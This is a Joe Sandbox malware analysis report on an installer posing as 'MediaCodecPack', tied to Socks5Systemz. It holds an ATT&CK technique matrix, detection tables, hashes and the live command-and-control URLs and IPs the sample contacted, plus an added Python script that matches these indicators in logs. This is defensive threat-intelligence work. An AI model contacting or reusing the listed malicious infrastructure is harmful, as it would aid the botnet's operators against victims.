                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,3_2_6096583A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,3_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6094A92B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6090EAE5 sqlite3_transfer_bindings,3_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,3_2_6095FB98
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,3_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_60969D75
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,3_2_6095FFB2
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS135
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets251
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Source | Detection | Scanner | Label | Link
                    Hbq580QZAR.exe | 18% | ReversingLabs | Win32.Trojan.Munp | -
                    Source | Detection | Scanner | Label | Link
                    C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | 100% | Joe Sandbox ML | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | 100% | Joe Sandbox ML | - | -
                    C:\ProgramData\MediaCodecPack\sqlite3.dll | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy) | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-38DHO.tmp | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FD66D.tmp | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FG1GT.tmp | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-GC9CG.tmp | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-L8DJ5.tmp | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy) | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy) | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy) | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy) | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-TV2PJ.tmp | 3% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy) | 3% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | 3% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | - | -
                    C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | - | -
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325 | 100% | Avira URL Cloud | malware | -
                    https://188.119.66.185/p4 | 0% | Avira URL Cloud | safe | -
                    https://188.119.66.185/d | 0% | Avira URL Cloud | safe | -
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 | 100% | Avira URL Cloud | malware | -
                    https://188.119.66.185/h | 0% | Avira URL Cloud | safe | -
                    https://188.119.66.185/allowedCert_OS_1 | 0% | Avira URL Cloud | safe | -
                    https://188.119.66.185/mCertificates | 0% | Avira URL Cloud | safe | -
                    https://188.119.66.185/z | 0% | Avira URL Cloud | safe | -
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4 | 100% | Avira URL Cloud | malware | -
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 | 100% | Avira URL Cloud | malware | -
                    https://188.119.66.185/v | 0% | Avira URL Cloud | safe | -
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 | true | Avira URL Cloud: malware | unknown
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 | false | Avira URL Cloud: malware | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://www.innosetup.com/ | Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.dr | false | - | high
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325 | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                    https://188.119.66.185/ography | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | Hbq580QZAR.exe | false | - | high
                    https://188.119.66.185/ | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.0000000003385000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | Hbq580QZAR.exe | false | - | high
                    https://188.119.66.185/d | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://188.119.66.185/allowedCert_OS_1 | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://188.119.66.185/h | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://188.119.66.185/p4 | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://www.remobjects.com/psU | Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.dr | false | - | high
                    https://188.119.66.185/priseCertificates | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    https://188.119.66.185/mCertificates | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://188.119.66.185/en-US | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    https://188.119.66.185/z | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://188.119.66.185/rosoft | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    https://188.119.66.185/en-GB | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    https://188.119.66.185/v | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://wonderwork.ucoz.com/ | Hbq580QZAR.tmp, 00000001.00000002.2736047862.0000000005AEC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1494194059.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, is-K5SAB.tmp.1.dr, mediacodecpack.exe.1.dr | false | - | high
                    https://188.119.66.185/C | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4 | mediacodecpack.exe, 00000003.00000002.2736393238.000000000337D000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.00000000033CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                    http://www.remobjects.com/ps | Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.dr | false | - | high
                    https://www.easycutstudio.com/support.html | Hbq580QZAR.exe, 00000000.00000003.1480741810.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000002.2734183284.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1480816119.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734658313.0000000002128000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734157494.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482724370.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482802130.0000000002128000.00000004.00001000.00020000.00000000.sdmp | false | - | high
                    https://188.119.66.185/H | mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    31.214.157.206 | unknown | Germany | 58329 | RACKPLACEDE | false
                    188.119.66.185 | unknown | Russian Federation | 209499 | FLYNETRU | false
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1577885
                                                  Start date and time:2024-12-18 21:06:57 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 6m 34s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Hbq580QZAR.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:015bce2662bf644e819a99d3d2b0548b.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@5/26@0/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 92%
                                                  • Number of executed functions: 196
                                                  • Number of non-executed functions: 294
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: Hbq580QZAR.exe
Time | Type | Description
15:08:38 | API Interceptor | 353306x Sleep call for process: mediacodecpack.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
31.214.157.206 | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 200
188.119.66.185 | steel.exe.2.exe | malicious | Socks5Systemz |
188.119.66.185 | stories.exe.2.exe | malicious | Socks5Systemz |
188.119.66.185 | basx.exe | malicious | Socks5Systemz |
188.119.66.185 | list.exe | malicious | Socks5Systemz |
188.119.66.185 | newwork.exe.1.exe | malicious | Socks5Systemz |
188.119.66.185 | stail.exe.3.exe | malicious | Socks5Systemz |
188.119.66.185 | steel.exe.3.exe | malicious | Socks5Systemz |
188.119.66.185 | newwork.exe.1.exe | malicious | Socks5Systemz |
188.119.66.185 | steel.exe.3.exe | malicious | Socks5Systemz |
188.119.66.185 | Oz2UhFBTHy.exe | malicious | Socks5Systemz |
                                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RACKPLACEDE | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 31.214.157.226
RACKPLACEDE | GEm3o8pION.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | bzX2pV3Ybw.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | 7i6bUvYZ4L.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | imMQqf6YWk.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | imMQqf6YWk.exe | malicious | Socks5Systemz | 31.214.157.206
FLYNETRU | steel.exe.2.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | stories.exe.2.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | basx.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | list.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | newwork.exe.1.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | stail.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | newwork.exe.1.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | Oz2UhFBTHy.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | steel.exe.2.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | stories.exe.2.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | basx.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | list.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | newwork.exe.1.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | stail.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | newwork.exe.1.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | steel.exe.3.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | cd#U9988.exe | malicious | Unknown | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\MediaCodecPack\sqlite3.dll | steel.exe.2.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | stories.exe.2.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | basx.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | list.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | newwork.exe.1.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | stail.exe.3.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | steel.exe.3.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | newwork.exe.1.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | steel.exe.3.exe | malicious | Socks5Systemz
C:\ProgramData\MediaCodecPack\sqlite3.dll | AbC0LBkVhr.exe | malicious | Socks5Systemz
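The context tables above are the indicators a responder would sweep for: the two contacted IPs (shown as Malicious: false in the contacted-IP table, yet each tied to earlier Socks5Systemz analyses), the 32-character hash in the third context table, the dropped sqlite3.dll path, and the dropped MediaCodecPack.exe with its SHA-256. The Python below is an added example, not part of the Joe Sandbox report, that runs a plain IOC match over a few constructed log lines. Assumptions: the 32-hex match value is treated as a JA3 client fingerprint (the header of that table is missing from this extract); the timestamped key=value log format, the host name WS01 and the user name alice are invented; the install-path pattern generalises the sandbox's C:\Users\user\... to any profile directory.

```python
"""IOC sweep over log lines, using the indicators from this report's context tables.

Added example; not part of the Joe Sandbox report. Log format and sample lines are
constructed for illustration.
"""
import re
from typing import Dict, List

# Contacted IPs from the report (both map to prior Socks5Systemz analyses).
IOC_IPS = {"31.214.157.206", "188.119.66.185"}

# 32-hex match value from the context table; treated as a JA3 client fingerprint (assumption).
IOC_JA3 = {"51c64c77e60f3980eea90869b68c58a8"}

# SHA-256 of the dropped MediaCodecPack.exe (3306150 bytes) as listed in the report.
IOC_SHA256 = {"3073d7435c4ecb43ba08c28d1238a05853379815c2f967575deb6df43937a1ac"}

# Dropped-file paths. The second pattern generalises the sandbox's C:\Users\user\...
# to any profile directory (assumption); matching is done on lower-cased text.
IOC_PATH_PATTERNS = [
    re.compile(r"c:\\programdata\\mediacodecpack\\sqlite3\.dll"),
    re.compile(r"c:\\users\\[^\\]+\\appdata\\local\\mediacodecpack 1\.0\.11\\mediacodecpack\.exe"),
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HEX32_RE = re.compile(r"\b[0-9a-f]{32}\b")   # MD5-sized tokens: JA3 hashes
HEX64_RE = re.compile(r"\b[0-9a-f]{64}\b")   # SHA-256 tokens


def scan_line(line: str) -> List[str]:
    """Return the indicators found in one log line, tagged by type."""
    low = line.lower()
    hits: List[str] = []
    hits += ["ip:" + ip for ip in IPV4_RE.findall(low) if ip in IOC_IPS]
    hits += ["ja3:" + h for h in HEX32_RE.findall(low) if h in IOC_JA3]
    hits += ["sha256:" + h for h in HEX64_RE.findall(low) if h in IOC_SHA256]
    for pattern in IOC_PATH_PATTERNS:
        m = pattern.search(low)
        if m:
            hits.append("path:" + m.group(0))
    return hits


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> indicators, for every line that matched at least one IOC."""
    result: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            result[i] = hits
    return result


# Constructed sample log (timestamped key=value lines; not taken from the report).
SAMPLE_LOG = [
    r"2024-12-18T20:07:50Z process host=WS01 image=C:\Users\alice\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe sha256=3073d7435c4ecb43ba08c28d1238a05853379815c2f967575deb6df43937a1ac",
    r"2024-12-18T20:07:55Z file_create host=WS01 path=C:\ProgramData\MediaCodecPack\sqlite3.dll",
    "2024-12-18T20:08:41Z conn host=WS01 src=10.0.0.7 dst=188.119.66.185 dport=443 proto=tcp ja3=51c64c77e60f3980eea90869b68c58a8",
    "2024-12-18T20:08:43Z conn host=WS01 src=10.0.0.7 dst=31.214.157.206 dport=80 proto=tcp",
    "2024-12-18T20:09:00Z conn host=WS01 src=10.0.0.7 dst=203.0.113.10 dport=443 proto=tcp ja3=0f1e2d3c4b5a69788796a5b4c3d2e1f0",
    r"2024-12-18T20:09:05Z process host=WS01 image=C:\Windows\System32\notepad.exe",
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(found)}")
```

The Malicious: false flag on both IPs in the contacted-IP table reflects only the sandbox's own verdict for this run; the ASN and IP context rows show the same hosts in ten earlier Socks5Systemz analyses, so they belong in the IOC set regardless of that flag.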
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3306150
                                                                                          Entropy (8bit):6.383118190067132
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:1JMOsl+1vp+rdZ72dLFGhFLQFpWVIvk3O/:1GLc1vp+rdp2vGhFLmvkm
                                                                                          MD5:ADAB835347D3F69415F7ED6C10C13B85
                                                                                          SHA1:540F6CCD18A0896D96FC711A0DD4C27F6C2E7403
                                                                                          SHA-256:3073D7435C4ECB43BA08C28D1238A05853379815C2F967575DEB6DF43937A1AC
                                                                                          SHA-512:067EFBF5E8A092C73F852A15A9E950D992D6018F08285481162310712F74169DE61BB14DC6A133681484CBAA6C6E7CDF0E54BA411737F3A901FB0BBFEA768F4C
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...F.bg.................j...D.......#............@...........................2.....B.3.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4.... ....... ..|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
